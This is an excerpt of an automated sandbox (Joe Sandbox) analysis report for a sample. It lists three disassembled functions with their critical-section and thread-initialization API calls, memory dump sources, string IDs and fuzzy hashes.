                      Function 04957BA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04957C10
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: @G@K$ZYA.
                      • API String ID: 4132704954-4236202813
                      • Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                      • Instruction ID: 1213575038c523a82ef544637b8d7b5647d95631f7cf84cebd34dcb3e32a8c94
                      • Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                      • Instruction Fuzzy Hash: CF018174F00304DFDB24EFA8E991A5C7BF0AB44314FA041BADD2557360D6757945CB49
                      Function 00406C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00406C99
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: CGV.$mix
                      • API String ID: 2296764815-1644454629
                      • Opcode ID: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                      • Instruction ID: 24033b3836d6b4f620cd462d172ded2aeb793c2235c3ef6269eb5d899298d204
                      • Opcode Fuzzy Hash: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                      • Instruction Fuzzy Hash: 2AF062B0F082049BDB10EBA9E982E5877A0AB45314FA4017AE906A77D2D6386D418B5D
                      Function 04956EA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04956F00
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: CGV.$mix
                      • API String ID: 4132704954-1644454629
                      • Opcode ID: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                      • Instruction ID: 0ace2dae8a327e575a5f5fe3e1d4c52e27c4eb285322fb79163cc70e8265dc82
                      • Opcode Fuzzy Hash: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                      • Instruction Fuzzy Hash: 70F096B0F44204DBDB10EFA8F942E5C77E0AB45324FF00175ED06973A0D63479458B59